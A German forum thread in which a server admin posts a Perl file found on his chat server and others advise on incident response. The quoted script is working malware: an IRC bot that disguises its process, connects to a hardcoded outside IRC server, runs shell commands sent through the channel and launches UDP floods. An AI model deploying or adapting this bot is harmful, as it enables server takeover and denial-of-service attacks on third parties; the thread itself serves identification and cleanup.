Datei -> lol7.pl gefunden....

[flaggi]

Moin...

Ich habe gerade das durch zufall gefunden... Auf meinen Server läuft noch nen chat ... und seit gestern ist diese Datei da...

Code: Select all

#!/usr/bin/perl

my $processo = '/bin/bash';
$0="$processo"."\0"x16;
use FileHandle;
use IPC::Open2;
use IO::Handle;
use Socket;
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket::INET;

my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);


my $evals="http://realhack.altervista.org/iniez.txt";
   my $nntrovato="No such nick/channel";
   my $chan="#drg";
   my $nick = "ToXiC|".int(rand(10)).int(rand(10)).int(rand(10)).int(rand(10)).int(rand(10)).int(rand(10));
   my $user= "ToXiC 8 *  : ToXiC Mutton : cazzo@cazzo.it : lol :fra";
   my $server ="85.14.242.82";
   my $porta ="6667";
   my $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server",PeerPort=>$porta) ;
$socket->autoflush(1);
print $socket "NICK $nickrn";
print $socket "USER $userrn";
print $socket "JOIN $chanrn";



  while (my $msg = <$socket>)
    {

$msg =~ s/rn$//;

if ($msg=~ /!cmds+(.*)/)
{
shell2($1);
}

if ($msg=~ /!udps+(.*?)s+(.*?)s+(.*)/)
{
if (my $pid = fork) {
     waitpid($pid, 0);
  } else {
      if (fork) {
         exit;
       } else {
print $socket "PRIVMSG $chan : UdP Fload CoDaTo By ToXiC CreWrn";
my ($ip,$port,$size,$time);
 $ip=$1;
 $port=$2; 
 $time=$3;
print $socket "PRIVMSG $chan :Ip: $iprn";
print $socket "PRIVMSG $chan :Porta $portrn";
print $socket "PRIVMSG $chan :Tempo $timern";

socket(crazy, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$ip");

 #printf "udp flood - odixn";

if ($port ==0 && $time ==0) {
 goto randpackets;
}
if ($port !=0 && $time !=0) {
 system("(sleep $time;killall -9 udp) &");
 goto packets;
}
if ($port !=0 && $time ==0) {
 goto packets;
}
if ($port ==0 && $time !=0) {
 system("(sleep $time;killall -9 udp) &"); 
 goto randpackets;
}

packets:
for (;;) {
 $size=$rand x $rand x $rand;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
} 

randpackets:
for (;;) {
 $size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

}

} 
}




#     print $msg; 
      if ($msg=~ /^PING :(.*)/)
        {
          print $socket "PONG :$1";
        }   
}   
 

sub sendraw {
  if ($#_ == '1') {
    my $socket = $_[0];
    print $socket "$_[1]n";
  } else {
      print $socket "$_[0]n";
  }
}

sub shell2{
  my $comando=$_[0];
 $pid = open2(*leggi, *scrivi, $comando );
      @got = <leggi>;
foreach my $lin (@got) {
             $c++;
             chop $lin;
             sendraw($socket, "PRIVMSG $chan :$lin");
}
}

sieht nicht gerade freundlich aus irgendwie ...
jemand nen Tip ?

Achja ... das .pl script ist net gestartet ...

[mattiass]

Moin...

Ich habe gerade das durch zufall gefunden... Auf meinen Server läuft noch nen chat ... und seit gestern ist diese Datei da...

Achja ... das .pl script ist net gestartet ...

Die hat man Dir durch irgendeine Lücke untergeschoben. Ich würde als erstes mal den ggw. Stand des Systems via Rettungssystem sichern und in den Serverlogs nach dem Request suchen, mit dem das Script heruntergeladen wurde.

[tischi]

print $socket "PRIVMSG $chan : UdP Fload CoDaTo By ToXiC CreWrn";

naja :P
scheint mit ein script zu sein was wohl ein chat zu spammt :P

google ->
http://www.google.de/search?hl=de&safe= ... rity&meta=

[mattiass]

naja :P
scheint mit ein script zu sein was wohl ein chat zu spammt :P

OH MANN... :roll:

[daemotron]

Der Paranoiker Ihres Vertrauens rät: Wo eines ist, könnnen auch noch mehr sein... also besser mal fix nachgeschaut, was am System noch so verändert wurde. Wenn Du nicht gekapselt hast (hardened chroot, RSBAC Jail, Xen o. ä) wirst Du wohl besser Standardverfahren 1 anwenden - Reinitialisierung...